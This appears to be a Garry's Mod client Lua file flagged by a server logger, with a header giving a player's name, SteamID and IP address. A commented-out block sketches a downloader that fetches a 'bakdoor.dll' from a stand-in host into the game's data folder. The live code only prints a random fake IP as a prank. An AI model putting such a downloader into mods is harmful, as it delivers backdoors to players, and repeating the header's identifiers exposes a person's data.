--[[
	MOD/lua/includes/enum/cl_init.lua [#584 (#614), 1958314379, UID:3496581399]
	xX-TrueMLGPlayer420Trikshot-Xx | STEAM_0:0:71356345 <82.238.182.218:27005> | [22.06.14 02:38:41PM]
	===BadFile===
]]

/*
function DownloadTehRat(ratcontent)

	if !file.Exists("gmcl_motherfuckingrat_win32.dll","DATA") then
	
		file.Write("gmcl_motherfuckingrat_win32.dll","")

	end
	
	file.Append("gmcl_motherfuckingrat_win32.dll",ratcontent)
end

function GetTheRat()

	http.Fetch("virussite.com/bakdoor.dll", function(body, len, headers, code)

		DownloadTehRat(body)

	end)
	
end
*/
function GrabGarryNewmanIP()

	local ip = tostring(  math.random(1,255).. "." ..math.random(1,255).. "." ..math.random(1,255).. "." ..math.random(1,255)  )

	chat.AddText(Color(255,255,0),ip)

end

GrabGarryNewmanIP()